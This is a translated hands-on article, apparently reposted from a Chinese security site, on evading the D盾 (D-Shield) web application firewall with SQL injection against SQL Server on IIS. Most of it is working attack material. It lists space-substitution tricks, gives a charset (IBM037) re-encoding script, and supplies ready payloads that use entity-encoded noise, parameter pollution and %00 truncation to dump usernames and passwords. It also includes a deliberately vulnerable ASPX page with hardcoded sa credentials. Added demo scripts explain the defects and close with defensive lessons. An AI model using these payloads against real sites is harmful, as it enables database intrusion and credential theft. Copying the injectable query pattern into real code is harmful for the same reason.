Hands-on | A summary of SQL injection bypasses for the D盾 (D-Shield) WAF
Original source: HACK學習呀
SQL Server characteristics
Spaces can be replaced by other characters
select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin
- Position ①
  - Other control characters can replace the space: %01~%0F, %11~%1F
  - Comment sequences: /**/, --+a%0d%0a
  - Arithmetic operators and data types can stand in for the space: news_id=1.0, news_id=1e0, news_id=1-1
- Position ②
  - Other control characters can replace the space: %01~%0F, %11~%1F
  - Comment sequences: /**/, --+a%0d%0a
  - A plus sign can replace the space: union+select
- Position ③
  - Other control characters can replace the space: %01~%0F, %11~%1F
  - Comment sequences: /**/, --+a%0d%0a
  - Arithmetic operators: +, -, ~, . (note: -, ~ and . only work when the first column of the select query has a numeric data type)
  - Parentheses can replace the space: select(1),2,db_name()
- Position ④
  - Other control characters can replace the space: %01~%0F, %11~%1F
  - Comment sequences: /**/, --+a%0d%0a
  - Other bytes: %80~%FF (requires the IIS web server)
- Position ⑤
  - Other control characters can replace the space: %01~%0F, %11~%1F
  - Comment sequences: /**/, --+a%0d%0a
  - Other bytes: %80~%FF (requires the IIS web server)
  - A dot can replace the space: from.users
  - Square brackets can replace the space: from[users]
Test environment
Database: SQL Server 2008 R2
Web server: IIS 7.5 (Chinese)
WAF: D盾_v2.1.6.1 [beta]
Target source code, index.aspx (deliberately vulnerable: the id parameter is concatenated straight into the query):

```aspx
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<script runat="server">
    private DataSet resSet = new DataSet();

    protected void Page_Load(object sender, EventArgs e)
    {
        String strconn = "server=.;database=test;uid=sa;pwd=admin";
        // Request.Params merges query string, form and cookies; repeated names are comma-joined.
        string id = Request.Params["id"];
        // Vulnerable by design: no parameterisation, id goes straight into the SQL text.
        string sql = string.Format("select * from newss where id={0}", id);
        SqlConnection connection = new SqlConnection(strconn);
        connection.Open();
        SqlDataAdapter dataAdapter = new SqlDataAdapter(sql, connection);
        dataAdapter.Fill(resSet);
        DgData.DataSource = resSet.Tables[0];
        DgData.DataBind();
        Response.Write("Executed statement:<br/>" + sql);
        Response.Write("<br/>Result:");
    }
</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>SQLServer injection test</title>
</head>
<body>
    <form id="form1" runat="server">
        <asp:DataGrid ID="DgData" runat="server" BackColor="White" BorderColor="#3366CC"
            BorderStyle="None" BorderWidth="1px" CellPadding="4"
            HeaderStyle-CssClass="head" Width="203px">
            <FooterStyle BackColor="#99CCCC" ForeColor="#003399" />
            <SelectedItemStyle BackColor="#009999" Font-Bold="True" ForeColor="#CCFF99" />
            <PagerStyle BackColor="#99CCCC" ForeColor="#003399" HorizontalAlign="Left"
                Mode="NumericPages" />
            <ItemStyle BackColor="White" ForeColor="#003399" />
            <HeaderStyle CssClass="head" BackColor="#003399" Font-Bold="True" ForeColor="#CCCCFF" />
        </asp:DataGrid>
    </form>
</body>
</html>
```
Bypass via an unusual character set encoding
Bypass principle
HTTP compatibility: the variety of HTTP charsets
The charset parameter of the Content-Type header is not only used in responses; a request can carry it as well, and the server decodes the request body with that charset.
Common servers and the encodings that work against them:

| Server | Usable encodings | Notes |
|---|---|---|
| Nginx, uWSGI-Django-Python3 | IBM037, IBM500, cp875, IBM1026, IBM273 | Encode both parameter names and values. The server URL-decodes names and values. `=` and `&` must be encoded in the charset as well (but not URL-encoded). |
| Nginx, uWSGI-Django-Python2 | IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424 | Encode both parameter names and values. The server URL-decodes names and values. `=` and `&` must not be encoded in any way. |
| Apache-TOMCAT8-JVM1.8-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 | Parameter names stay in their raw form (URL-encoding as usual is fine). The body works whether or not it is URL-encoded. `=` and `&` must not be encoded in any way. |
| Apache-TOMCAT7-JVM1.6-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 | Parameter names stay in their raw form (URL-encoding as usual is fine). The body works whether or not it is URL-encoded. `=` and `&` must not be encoded in any way. |
| IIS6, 7.5, 8, 10 - ASPX (v4.x) | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025 | Parameter names stay in their raw form (URL-encoding as usual is fine). The body works whether or not it is URL-encoded. `=` and `&` must not be encoded in any way. |
Test steps
We use the following script (encode.py) to convert the parameters into the target charset:

```python
import sys
from urllib.parse import quote_plus, unquote


def paramEncode(params="id=1", charset="IBM037", encodeEqualSign=False,
                encodeAmpersand=False, urldecodeInput=True, urlencodeOutput=True):
    """Re-encode every parameter name and value of a form body in `charset`.
    By default '=' and '&' are left as plain ASCII; set encodeEqualSign /
    encodeAmpersand for servers (see the table above) that want them in the
    charset as raw bytes rather than percent-encoded."""
    result = ""
    equalSign = "="
    ampersand = "&"
    if encodeEqualSign:
        # raw charset bytes, one latin-1 character per byte, not percent-encoded
        equalSign = "=".encode(charset).decode("latin-1")
    if encodeAmpersand:
        ampersand = "&".encode(charset).decode("latin-1")
    for param_pair in params.split("&"):
        param, value = param_pair.split("=", 1)
        if urldecodeInput:
            param = unquote(param)
            value = unquote(value)
        param = param.encode(charset)
        value = value.encode(charset)
        if urlencodeOutput:
            param = quote_plus(param)
            value = quote_plus(value)
        else:
            param = param.decode("latin-1")
            value = value.decode("latin-1")
        if result:
            result += ampersand
        result += param + equalSign + value
    return result


if __name__ == "__main__":
    # write bytes so that un-percent-encoded output survives unchanged
    sys.stdout.buffer.write(paramEncode(sys.argv[1], sys.argv[2]).encode("latin-1") + b"\n")
```

Here we test with the IBM037 encoding.
In the Chinese version of BurpSuite you first need to change BurpSuite's font, otherwise the encoded bytes do not display.
Capture the request with BurpSuite and send it to Repeater.
Change the request method to POST.
Add a charset parameter with the value ibm037 to the Content-Type header:
Content-Type: application/x-www-form-urlencoded;charset=ibm037
Encode the parameters with the script:
python3 encode.py "id=1" IBM037   # prints %89%84=%F1
Replace the request body with %89%84=%F1 and send it.
The query data is returned normally.
Now perform the SQL injection in the same way, encoding the whole payload in IBM037.
The D盾 WAF is bypassed.
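As an added example (not part of the original article), the script below reproduces offline why the trick works. It encodes a body the way encode.py does, then decodes it twice: once as a charset-aware IIS/ASPX backend would (`=` and `&` left as ASCII, everything between them percent-decoded and then decoded with the charset declared in Content-Type), and once as a filter that ignores the request charset would. The keyword rule, the sample payload and the form-decoding logic are constructed for the demo; they are a simplified model of the IIS row in the table, not the real parser or any WAF's code.

```python
import re
from urllib.parse import quote_plus, unquote_to_bytes

# Constructed sample: the injection an attacker wants the backend to see.
PLAIN_BODY = "id=1 union select 1,2,db_name()"

# Stand-in for a WAF rule that inspects the body without honouring the charset.
INJECTION_RULE = re.compile(r"union\s+select", re.IGNORECASE)


def encode_body(body: str, charset: str) -> str:
    """Rebuild a form body with names and values in `charset` (percent-encoded),
    leaving '=' and '&' as plain ASCII, which is what IIS expects."""
    pairs = []
    for pair in body.split("&"):
        name, value = pair.split("=", 1)
        pairs.append(quote_plus(name.encode(charset)) + "=" + quote_plus(value.encode(charset)))
    return "&".join(pairs)


def charset_from_content_type(content_type: str) -> str:
    """Pull the charset parameter out of a Content-Type header (default utf-8)."""
    m = re.search(r";\s*charset=([\w\-]+)", content_type, re.IGNORECASE)
    return m.group(1) if m else "utf-8"


def server_decode(content_type: str, raw_body: str) -> dict:
    """Decode like a charset-aware backend: split on ASCII '&' and '=',
    percent-decode each part to bytes, then decode the bytes with the charset."""
    charset = charset_from_content_type(content_type)
    params = {}
    for pair in raw_body.split("&"):
        name_b, value_b = pair.split("=", 1)
        name = unquote_to_bytes(name_b.replace("+", " ")).decode(charset)
        value = unquote_to_bytes(value_b.replace("+", " ")).decode(charset)
        params[name] = value
    return params


def naive_filter_view(raw_body: str) -> str:
    """What a filter that ignores the charset sees: percent-decoding as latin-1."""
    return unquote_to_bytes(raw_body).decode("latin-1")


def demo(charset: str = "IBM037") -> dict:
    """Encode PLAIN_BODY in `charset` and compare the two decodings."""
    ctype = "application/x-www-form-urlencoded;charset=" + charset
    raw = encode_body(PLAIN_BODY, charset)
    backend = server_decode(ctype, raw)
    return {
        "raw_body": raw,
        "filter_matches": bool(INJECTION_RULE.search(naive_filter_view(raw))),
        "backend_matches": bool(INJECTION_RULE.search(backend["id"])),
        "backend_id": backend["id"],
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=>", repr(v))
```

The same function also shows the fix on the defending side: a WAF must parse the charset parameter and decode the body with it (or reject bodies that declare a charset the backend would accept but the WAF does not understand) before any keyword rule runs.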
Bypass combining D盾's data-cleaning defect with several rule characteristics
Bypass principle
Rule defect/characteristic: D盾's data-cleaning behaviour
A WAF has several built-in decoders, and after multiple rounds of decoding the result may no longer match the rules.
When a submitted parameter value contains a lot of noise, such as many spaces, tabs, newlines, %0c or comments, the WAF "cleans" it first (to improve performance and keep rules simple) and then inspects what it takes to be the real payload. If the cleaning is wrong, the real attack fragment is removed during cleaning and the data that reaches the rules no longer contains the attack vector, so the request is let through.
Rule defect/characteristic: the database accepts other characters in place of spaces
See the SQL Server characteristics above for the substitute characters.
Rule defect/characteristic: %00 is treated as end of input
In a URL, %00 is ASCII 0 (NUL), which is reserved as a terminator in many string routines; a filter that stops reading at it only inspects the part before it.
Rule defect/characteristic: HTTP parameter pollution
When the parameter id is submitted more than once, the application receives all the values, joined with commas.
Test steps
Capture the request and change the request method.
Testing D盾's data-cleaning behaviour:
To defend against XSS, D盾 HTML-entity-encodes special characters in submitted data; for example, a submission containing such characters comes back entity-encoded (shown in the original screenshot).
So what happens if we submit data that is already entity-encoded?
Here `&gt;` is not decoded; instead the `&` itself is entity-encoded again (so `&gt;` becomes `&amp;gt;` in the WAF's view).
We can exploit this: placing the string `&gt;` (URL-encoded as %26%67%74%3b) between keywords defeats rules that match several keywords in sequence, such as union...select, order...by, /*...*/, '...' and so on.

Bypassing and 1=1
Note: 1.e can replace the space.

```
id=1.eand/*%26%67%74%3b*/1=1
```

Bypassing order by

```
id=1 order/*%26%67%74%3b*/by 2
```

Bypassing union select

```
id=-1.eunion--%26%67%74%3b%0aselect NULL,NULL,NULL
```

Bypassing from
Getting past from takes more craft: it combines HTTP parameter pollution (HPP) with %00 truncation. The second id parameter is smuggled inside a comment, so the WAF stops reading at %00 while ASP.NET joins both values with a comma and the comment swallows the join.

```
id=-1.eunion--%26%67%74%3b%0aselect NULL,username,password/*%26%67%74%3b&id=%00%0d*/from users
```
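As an added example (not part of the original article), the script below reproduces offline the two behaviours the from bypass relies on: ASP.NET's Request.Params joining repeated parameters with a comma (modelled with parse_qs), and a filter that inspects each occurrence of the parameter separately and stops reading at the first NUL byte, which is the cleaning defect described above in simplified form. The table and column names, the blocklist rules and the comment-stripping helper are constructed for the demo; the `&gt;` re-encoding is not modelled, and nothing here is D盾's own code.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed: the query string of the from bypass above, with the second id
# parameter smuggled inside the comment so the filter truncates at %00.
QUERY = ("id=-1.eunion--%26%67%74%3b%0aselect NULL,username,password/*%26%67%74%3b"
         "&id=%00%0d*/from users")

# Stand-in for a multi-keyword rule: every regex must hit on one inspected value.
RULES = [re.compile(p, re.IGNORECASE | re.DOTALL)
         for p in (r"union.*select", r"select.*from", r"\bfrom\s+\w+")]

SQL_TEMPLATE = "select * from newss where id={0}"   # the vulnerable index.aspx query


def app_param(query: str, name: str) -> str:
    """Request.Params[name] semantics: all values for `name`, comma-joined."""
    values = parse_qs(query, keep_blank_values=True).get(name, [])
    return ",".join(values)


def filter_param_view(query: str, name: str) -> list:
    """What the defective filter inspects: each occurrence of `name` is
    percent-decoded on its own and read only up to the first NUL byte."""
    views = []
    for pair in query.split("&"):
        k, _, v = pair.partition("=")
        if k == name:
            views.append(unquote(v).split("\x00", 1)[0])
    return views


def filter_blocks(query: str, name: str) -> bool:
    """Blocked only if a single inspected view satisfies every rule."""
    return any(all(r.search(v) for r in RULES) for v in filter_param_view(query, name))


def strip_sql_comments(sql: str) -> str:
    """Drop /* */ and -- comments the way the SQL parser will, to show what executes."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.DOTALL)
    return re.sub(r"--[^\n]*\n", " ", sql)


def demo() -> dict:
    """Run QUERY through the filter model and the application model."""
    injected = app_param(QUERY, "id")
    sql = SQL_TEMPLATE.format(injected)
    return {
        "filter_blocks": filter_blocks(QUERY, "id"),
        "app_sql": sql,                       # contains the comma and the NUL, inside the comment
        "effective_sql": re.sub(r"\s+", " ", strip_sql_comments(sql)).strip(),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=>", repr(v))
```

The defensive lesson is the mirror image: a filter in front of ASP.NET has to reassemble repeated parameters the same way the framework does (comma-joined, NUL bytes kept) and inspect the joined value, otherwise the two halves of the statement are never seen together.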